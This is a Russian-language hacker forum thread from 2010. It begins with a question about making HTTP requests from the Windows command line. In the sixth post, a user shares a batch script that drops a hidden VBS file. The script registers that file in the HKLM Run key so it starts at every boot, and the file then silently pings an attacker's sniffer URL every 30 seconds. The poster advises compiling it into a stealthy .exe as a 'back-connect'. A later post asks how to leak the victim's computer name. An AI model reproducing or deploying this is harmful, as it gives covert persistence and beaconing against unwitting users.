post\get in CMD

Discussion in 'С/С++, C#, Rust, Swift, Go, Java, Perl, Ruby' started by aka_k4, 1 Mar 2010.

  1. aka_k4

    aka_k4 Member

    Joined:
    5 Feb 2009
    Messages:
    113
    Likes Received:
    29
    Reputations:
    0
    Друзья,

    можно ли через консоль организоваь пост гет запрос?

    т.е. открыть браузер и перейти на сайт, это одно, но нужен запрос только в окне кансоли, как например брут хттп в Hydra.

    Кто падскажет иле хотя бы натолкнет на мыслю?
     
  2. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    288
    Likes Received:
    121
    Reputations:
    21
    можно через netcat:
    Code:
    cat request.txt | netcat site.com 80 > response.txt
    при этом request.txt содержит полностью GET или POST запрос
     
  3. aka_k4

    aka_k4 Member

    Joined:
    5 Feb 2009
    Messages:
    113
    Likes Received:
    29
    Reputations:
    0
    спасибо большое. хорошо.

    альтернативы есть? ( не то штобы метод не подхадил, просто хачу паглубжэ прознать вопрос)

    request.txt может храниться на хосте? либо только на машине на которой выполняетца гет\пост?
     
  4. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    105
    Likes Received:
    78
    Reputations:
    40
    Так же интересует как будет выглядеть посыл на сниффер в request.txt ?

    Прям так туда и записать ?

    GET http://host.com/public/s.gif HTTP/1.1
    Host: host.com
    User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 Paros/3.2.13
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru,en-us;q=0.7,en;q=0.3
    Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
    Keep-Alive: 115
    Proxy-Connection: keep-alive

    Как беспалевнее послать на сниффер через .bat ?

    И возможно ли это вообще ?
     
    #4 HellFire, 1 Mar 2010
    Last edited: 1 Mar 2010
  5. aka_k4

    aka_k4 Member

    Joined:
    5 Feb 2009
    Messages:
    113
    Likes Received:
    29
    Reputations:
    0
    Как беспалевнее послать на сниффер через .bat ?

    в приципе между строк вапросов сабжа имено это я и хотел передать) + поправочка - беспалева
     
  6. HellFire

    HellFire Elder - Старейшина

    Joined:
    18 Jan 2009
    Messages:
    105
    Likes Received:
    78
    Reputations:
    40
    Изящное решение для такого посыла на сниффер делаем такой батник:

    Code:
    MD %SystemRoot%\123123
    echo >%SystemRoot%\123123\123.vbs
    echo Set oHTTP = WScript.CreateObject("winhttp.winhttprequest.5.1") >%SystemRoot%\123123\123.vbs
    echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs
    echo sSource = "[COLOR=Red]http://host.com/public/s.gif[/COLOR]" >>%SystemRoot%\123123\123.vbs
    echo iTimer = Timer >>%SystemRoot%\123123\123.vbs
    echo While 1 >>%SystemRoot%\123123\123.vbs
    echo     WScript.Sleep 1000 >>%SystemRoot%\123123\123.vbs
    echo         If (Timer - iTimer)  * 3 Then >>%SystemRoot%\123123\123.vbs
    echo         oHTTP.open "GET", sSource, False >>%SystemRoot%\123123\123.vbs
    echo           on error resume next >>%SystemRoot%\123123\123.vbs
    echo         oHTTP.send >>%SystemRoot%\123123\123.vbs
    echo         iTimer = Timer >>%SystemRoot%\123123\123.vbs
    echo     End If >>%SystemRoot%\123123\123.vbs
    echo WEnd >>%SystemRoot%\123123\123.vbs
    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v 123 /t REG_SZ /d %SystemRoot%\123123\123.vbs /f
    start "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\123" %SystemRoot%\123123\123.vbs
    attrib /d %systemdrive%\Docume~1\123 +h +s
    Это добро пропускается через QBFC в ghost режиме и делается .exe - получаем что то вроде "бек-коннекта" на сниффер. :)

    Учтите что лог сниффера будет постоянно засран.

    echo iPeriod = 30 >>%SystemRoot%\123123\123.vbs - Кол-во секунд до следующего захода на сниффер целью, в данном случае оно равно 30 секундам.

    Для тестирования вот вам сорсы сниффера - http://kanick.ru/sniffer/public.rar

    Лечится так:

    1. Пуск>выполнить>msconfig>автозагрузка>убрать галку с 123
    2. Удалить фаил С:/windows/123123/123.vbs
    3. Убить процесс wscript.exe

    Радуемся и пляшем. :cool:
     
    #6 HellFire, 1 Mar 2010
    Last edited: 1 Mar 2010
  7. aka_k4

    aka_k4 Member

    Joined:
    5 Feb 2009
    Messages:
    113
    Likes Received:
    29
    Reputations:
    0
    Фаер крутой, вапрос закрыт
     
  8. mazaxaka

    mazaxaka Elder - Старейшина

    Joined:
    15 Feb 2008
    Messages:
    424
    Likes Received:
    45
    Reputations:
    0
    А можно ли просто из cmd отправить гет\пост запрос такого типа
    http://site.ru/undex.php?name=%COMPUTERNAME%
    без использования vb скрипта?
     
  9. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,739
    Likes Received:
    145
    Reputations:
    18
    Это круто ! :) уже правдо где то было на ачате :)
     
  10. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,739
    Likes Received:
    145
    Reputations:
    18
    фантазируй :)
     
  11. fker

    fker Member

    Joined:
    26 Nov 2008
    Messages:
    138
    Likes Received:
    64
    Reputations:
    -1
    Через telnet еще можно. Что то типа:
    telnet google.com 80
    %хттп запрос%
    подробней
     
  12. wizzzarden

    wizzzarden New Member

    Joined:
    5 Sep 2015
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    Чем дело кончилось?
    Работает подобный запрос?